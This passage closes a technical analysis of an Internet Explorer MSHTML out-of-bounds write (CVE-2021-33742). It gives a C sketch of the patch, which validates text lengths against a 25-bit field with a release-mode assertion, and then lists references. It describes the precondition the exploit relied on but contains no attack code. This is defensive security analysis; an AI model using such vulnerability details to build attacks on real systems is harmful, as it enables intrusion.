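The following C sketch shows the same idea as the patch: reject lengths that do not fit in 25 bits before packing, using a check that, unlike assert(), is not removed when NDEBUG is defined. RELEASE_ASSERT, cch_fits_datapostext() and pack_sid_cch_checked() are hypothetical names. The real Release_Assert() raises a non-continuable breakpoint exception rather than calling abort(), and the decompiled check compares after casting SrcTextCch to int, whereas this sketch uses an unsigned comparison.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-in for Release_Assert(): it does not depend on NDEBUG,
   so it stays active in release builds. mshtml raises a breakpoint exception
   instead; this sketch prints a message and calls abort(). */
#define RELEASE_ASSERT(cond)                                            \
    do {                                                                \
        if (!(cond)) {                                                  \
            fprintf(stderr, "release assertion failed: %s\n", #cond);   \
            abort();                                                    \
        }                                                               \
    } while (0)

#define DPT_CCH_LIMIT 0x2000000u   /* 2^25: first length that no longer fits */
static_assert(DPT_CCH_LIMIT == 1u << 25, "25-bit length field");

/* True if a text length can be stored in the 25-bit DATAPOSTEXT::_cch. */
static bool cch_fits_datapostext(uint32_t cch) {
    return cch < DPT_CCH_LIMIT;
}

/* Patched-style packing: validate first, then pack length and sid. */
static uint32_t pack_sid_cch_checked(uint32_t cch, uint8_t sid) {
    RELEASE_ASSERT(cch_fits_datapostext(cch));
    return (cch & (DPT_CCH_LIMIT - 1u)) | ((uint32_t)sid << 25);
}
```

Terminating on an oversized length, rather than silently masking it, keeps the 25-bit and 32-bit length fields from ever disagreeing, which is the precondition the out-of-bounds write relied on.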

 

References

1. Google Project Zero – CVE-2021-33742: Internet Explorer out-of-bounds write in MSHTML
2. Google Threat Analysis Group – How we protect users from 0-day attacks
3. weolar – A few goodies: complete, compilable IE2 and IE5.5 source code
4. o_0xF2B8F2B8 – IE DOM tree overview
5. Microsoft Edge Team – Modernizing the DOM tree in Microsoft Edge

(End)